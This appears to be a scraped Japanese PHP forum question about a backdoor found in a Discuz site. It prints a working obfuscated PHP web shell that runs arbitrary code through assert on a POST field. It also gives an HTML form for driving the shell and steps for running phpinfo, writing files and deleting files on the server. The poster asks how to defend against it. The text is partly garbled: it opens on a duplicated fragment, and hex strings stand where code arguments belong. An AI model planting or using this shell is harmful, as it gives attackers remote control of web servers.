ホームページ >バックエンド開発 >PHPチュートリアル >discuzにこのコードがあります

discuzにこのコードがあります

WBOY
WBOYオリジナル
2016-06-23 13:32:32973ブラウズ

8db33fee8ed404a10035c4978bd09792', true); 送信すると、abc.php ファイルがサーバー上に作成されます。
3. unlink('xxxxx'); と入力して、xxx​​ ファイルを削除します。



上の階の回答ありがとうございます。

が、アサートを使用して php 関数を実行するトロイの木馬である理由を知りたいので削除しました。

7.php

<?php                  @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";                  @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";                  @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}                  [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
次に、7.php を呼び出す HTML ファイルを作成します。これは、アクション内の 7.php を対応する http パスに変更するだけです。

shell.html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html> <head>  <title> New Document </title> </head> <body>  <form name="form1" method="post" action="http://fdipzone.com/fdipzone/7.php">  <textarea name="-7" style="width:500px; height:300px"></textarea>    <input type="submit" value="submit"></form> </body></html>
次に、shell.html を実行し、
1. textarea に phpinfo(); と入力して送信すると、phpinfo(); の情報が表示されます
2. たとえば、file_put_contents(' と入力します) textarea abc.php','6d4e7cc4aa9dab750e99e6a55218ca1b', true); 送信すると、abc.php ファイルがサーバー上に作成されます。
3. unlink('xxxxx'); と入力して、xxx​​ ファイルを削除します。




ところで、これを投稿しましたが、この種の攻撃を防ぐ方法はありますか?


人々はすでにバックドアから離れていますが、それでも予防策を講じることはできますか?
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。